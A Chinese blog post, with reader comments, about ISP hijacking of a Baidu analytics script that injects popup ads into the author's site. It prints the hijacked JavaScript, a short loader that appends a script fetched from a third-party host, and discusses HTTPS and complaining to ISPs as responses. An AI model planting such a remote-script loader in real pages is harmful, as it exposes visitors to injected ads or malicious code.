最近在家里打开自己的博客经常网页底部弹出弹窗广告,虽然博客放了百度的广告,但我并没有设置底部弹窗,一度以为网站被人黑了,分析了下页面代码才发现,原来是百度统计的 js 链接被劫持,导致网站跳出广告。
百度统计里有一段是通过以下 js 链接引用百度官方的代码,原本打开后是一大堆乱七八糟的 js,被劫持后就变成几行全新的代码。
百度统计被劫持的 js 链接地址:http://cpro.baidustatic.com/cpro/ui/i.js。
被劫持后上面 js 链接打开后的代码内容:
var jumpJs='http://cpro.baidustatic.com/cpro/ui/i.js';
var _ruleType='nn_p';
var comjs='http://yunyunyun.b0.upaiyun.com/js/scriptcc_v1.min.js';
if (typeof _flag == 'undefined'){var _flag = true;}else{comjs=jumpJs+'?checkSign=201509';}
var script=document.createElement("script");
script.src=comjs;
script.type='text/javascript';
document.head.appendChild(script);
有趣的是,这个代码里面第 3 行的那个外链 js 居然是引用又拍云的,而这个地址不知道什么原因经常会打不开(能打开时是一大堆乱七八糟的 JS 代码),导致审查元素的时候会提示 net::ERR_CONNECTION_TIMED_OUT 错误,但不影响百度链接被劫持后强行弹窗的广告。
劫持后弹出的广告代码会伪造一个 cnzz 统计的样子,然后通过 iframe 打开一个 i.dreamfull.cn 的页面,ping dreamfull.cn 和 i.dreamfull.cn 返回的值不一样,根域名返回的是 101.200.29.89 的 ip 地址,但请求超时,2 级域名返回的地址是 i.dreamfull.cn.w.kunlunpi.com [61.154.126.30],能 ping 的通,貌似还是阿里云的服务器。Whois 查了下这两个域名,都是阿里巴巴(万网)注册的,且设置了隐私保护。
搜索了一下,发现不止我一个人遇到这种情况,也知道了这种情况原来是 DNS 被运营商污染导致的,而且大多发生在小城镇或者城郊地区(城区估计是怕被投诉,小地方弹出广告估计用网络的也不知道怎么回事),不分电信还是移动还是其他运营商(我用的是电信),怎一个黑心了得。
百度贴吧里有个帖子,不知道是什么年代的,说是把地址改成 https 能解决问题,经过实测没有任何鸟用,所以,估计要解决问题估计只有等运营商良心发现了。
厉害了,我的哥。老哥不打算上Let's Encrypt的车吗?
已经上了,不过没解决cdn的问题,还没用起来。
这不是大炮(Great Cannon)么!
搜索了下 Great Cannon 难道你的意思是这是被黑了?
大炮是一种国家级的网络攻击形式,不过只要运营商级就可以做得到,1可以劫持流量,2可以定向攻击。
这意思是我变成肉鸡了么?上ssl还有救么?
不是你变成肉鸡,而是访问你网站的用户会变成肉鸡,这个其实和你关系不大,只要你引用了百度的脚本,那就是会这样。
上ssl并不一定有效,因为你最后还是要引用非ssl的百度代码。而且没法确定百度不是参与者之一。
百度的产品,你们居然还在用,还敢用!它的产品就没有可替代的吗?答案是否定的!
主要是挂了百度广告,顺便用百度统计,这样登录百度联盟就能看到统计信息比较方便。
我们公司网站前阵子也出现广告,改https有效啊
审查元素看我的百度代码 有加https,无效。
据说了要本站https才有效。
你这是开启了其他服务吧,百度统计是那个hm开头的域名
也是百度的,好像是百度广告。
我目前在和运营商沟通,垃圾电信依旧不改DNS劫持本色。
他会承认么?难道不是直接投诉?
博主你好,我们现在也遇到这个问题。
百度官方的解决办法无效。
我们现在也不得不暂时放弃百度统计,
请教博主,除了放弃百度统计和上https,可还有其他解决办法?
还有一种方法就是去投诉你的电信服务商,如果是电信就投诉电信,如果是移动就投诉移动,如果是联通就投诉联通,具体到哪里去投诉我也不大清楚。
刚看了下,我这边也被劫持了...
貌似你没用百度统计啊。
原来是这个原因,还以为百度这么恶心,在免费的统计上放广告。。。误会百度了。不过现在换用CNZZ也挺好的
百度黑心也不是第一天了,只是越发疯狂了,“上帝要让其灭亡必先让其疯狂” 嘻嘻
没加SSL的娃怎么办
上腾讯的,免费一年,我试过了,申请很快。
我在阿里云的免费虚拟主机,打算2月份过去继续买一个虚拟主机待着吧又不用管!
你不是说ssl么,我说的是腾讯的免费ssl啊。
我都不用这些统计工具的。话说也就自己网站,换其他不常用网站弹个广告可能没注意也就过去了。
那肯定了,不是自己的站广告那么多谁还管它是谁的广告啊。
统计代码有的时候看看都哪里来的也挺有趣。
一开始以为是很强的技术贴,看完后,原来是吐槽……
我博客没几篇技术的。
我去,亏的打算把新网站的超文本协议改成https
据说是有用的,我这里之所以没用是因为我的网站不是https。
咱这段位的还用什么百度统计啊。
如果需要统计的话用piwik吧。
全家桶啊,百度广告 百度统计,嘿嘿嘿。
你玩的那个貌似要自己搭也挺麻烦。
现在运营商劫持实在太恶心了
这个还真没遇到过,不过确实挺可气的,不过都是为了钱……
=,=我一直用的CNZZ。。。话说,你的这个代码高亮,有点问题,有点乱掉了。。。是不是用的UEDITOR?
不是,我这个代码高亮是js的,js被我放末尾了,所以要js加载完了它才会显示正常。
以前也用过cnzz 不做后来不知道为啥放弃了,cnzz一样也会被劫持。
被劫持的具体体现是?!=,=|||
弹窗广告啊。。。
只要你网站是https,引用的js也是https,应该没问题才对啊。任何一环不是https才可能被劫持。
我网站没有 https 加密。。。
那当然没用了
岂止三线小地方,中大型城市也比比皆是。主要还是没人管。
大的地方投诉应该会有效,可以试试,小地方天高皇帝远,根本不鸟。
HTTPS 都能劫持,好厉害。。。
试过没用,不知道为什么。
要不把百度广告给撤掉???
是百度统计被劫持。
够恶心的,投诉运营商
小地方,投诉人家估计都不鸟你。
好像可以到工信部网站投诉,据说效果很好。